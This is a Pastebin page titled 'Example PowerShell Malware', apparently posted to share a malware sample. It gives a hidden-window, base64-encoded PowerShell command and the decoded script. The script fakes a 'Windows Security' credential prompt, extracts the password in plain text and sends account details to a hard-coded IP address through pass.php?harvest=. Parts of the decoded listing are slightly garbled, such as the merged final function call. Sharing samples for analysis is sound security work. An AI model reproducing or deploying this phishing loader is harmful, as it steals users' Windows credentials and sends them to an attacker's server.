daily pastebin goal
83%
SHARE
TWEET

[@JohnLaTwC] Example PowerShell Malware

a guest Sep 25th, 2016 889 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //from 3ba60be040c96f275fd968fa13810c4b808489a7
  2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -nop -win hidden -noni -enc ZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBMAG8AZwBpAG4AUAByAG8AbQBwAHQACgB7AAoAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACIAUwB5AHMAdABlAG0ALgB3AGUAYgAiACkACgAkAGMAcgBlAGQAIAA9ACAAJABIAG8AcwB0AC4AdQBpAC4AUAByAG8AbQBwAHQARgBvAHIAQwByAGUAZABlAG4AdABpAGEAbAAoACIAVwBpAG4AZABvAHcAcwAgAFMAZQBjAHUAcgBpAHQAeQAiACwAIAAiAFAAbABlAGEAcwBlACAAZQBuAHQAZQByACAAdQBzAGUAcgAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAiACwAIAAiACQAZQBuAHYAOgB1AHMAZQByAGQAbwBtAGEAaQBuAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQAiACwAIgAiACkACgAkAHUAcwBlAHIAbgBhAG0AZQAgAD0AIAAiACQAZQBuAHYAOgB1AHMAZQByAG4AYQBtAGUAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgAkAGUAbgB2ADoAdQBzAGUAcgBkAG8AbQBhAGkAbgAiAAoAJABmAHUAbABsACAAPQAgACIAJABkAG8AbQBhAGkAbgAiACAAKwAgACIAIgAgACsAIAAiACQAdQBzAGUAcgBuAGEAbQBlACIACgAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAkAGMAcgBlAGQALgBHAGUAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAApAC4AcABhAHMAcwB3AG8AcgBkAAoAJABvAHUAdABwAHUAdAAgAD0AIAAkAG4AZQB3AGMAcgBlAGQAIAA9ACAAJABjAHIAZQBkAC4ARwBlAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAgAHwAIABzAGUAbABlAGMAdAAtAG8AYgBqAGUAYwB0ACAAVQBzAGUAcgBOAGEAbQBlACwAIABEAG8AbQBhAGkAbgAsACAAUABhAHMAcwB3AG8AcgBkAAoAJAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAJABvAHUAdABwAHUAdAAuAFUAcwBlAHIATgBhAG0AZQAKAFMAZQBuAGQALQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAKAAkAHUAcwBlAHIAbgBhAG0AZQAsACAAJABwAGEAcwBzAHcAbwByAGQALAAgACQAZABvAG0AYQBpAG4AKQAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQALQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAKAAkAHUAcwBlAHIAbgBhAG0AZQAsACAAJABwAGEAcwBzAHcAbwByAGQALAAgACQAZABvAG0AYQBpAG4AKQAKAHsACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsACgAkAHUAcwBlAHIAbgBhAG0AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVwBlAGIALgBIAHQAdABwAFUAdABpAGwAaQB0AHkAXQA6ADoAVQByAGwARQBuAGMAbwBkAGUAKAAkAHUAcwBlAHIAbgBhAG0AZQApADsACgAkAGYAdQBsAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ASAB0AHQAcABVAHQAaQBsAGkAdAB5AF0AOgA6AFUAcgBsAEUAbgBjAG8AZABlACgAJABmAHUAbABsACkAOwAKACQAcgBlAHMAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANgA5AC4AMQA0ADMALgAxADIAMwAuADcAMQAvAHAAYQBzAHMALgBwAGgAcAA/AGgAYQByAHYAZQBzAHQAPQAkAHUAcwBlAHIAbgBhAG0AZQAmAG0AaQBzAGMAPQAkAGYAdQBsAGwAIgApAAoAfQAKAAoASQBuAHYAbwBrAGUALQBMAG8AZwBpAG4AUAByAG8AbQBwAHQACgBTAGUAbgBkAC0AQwByAGUAZABlAG4AdABpAGEAbABzAA==
  3. -->
  4. function Invoke-LoginPrompt{[System.Reflection.Assembly]::LoadWithPartialName("System.web")
  5.     $cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","")
  6.     $username = "$env:username"
  7.     $domain = "$env:userdomain"
  8.     $full = "$domain" + "" + "$username"
  9.     $password = $cred.GetNetworkCredential().password
  10.     $output = $newcred = $cred.GetNetworkCredential()
  11.     | select-object UserName, Domain, Password
  12.     $username = $output.UserName
  13.     Send-Credentials($username, $password, $domain)
  14. }
  15. function Send-Credentials($username, $password, $domain)
  16. {
  17.     $wc = New-Object system.Net.WebClient;
  18.     $username = [System.Web.HttpUtility]::UrlEncode($username);
  19.     $full = [System.Web.HttpUtility]::UrlEncode($full);
  20.     $res = $wc.downloadString("http://69.143.123.71/pass.php?harvest=$username&misc=$full")
  21. }
  22. Invoke-LoginPromptSend-Credentials
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand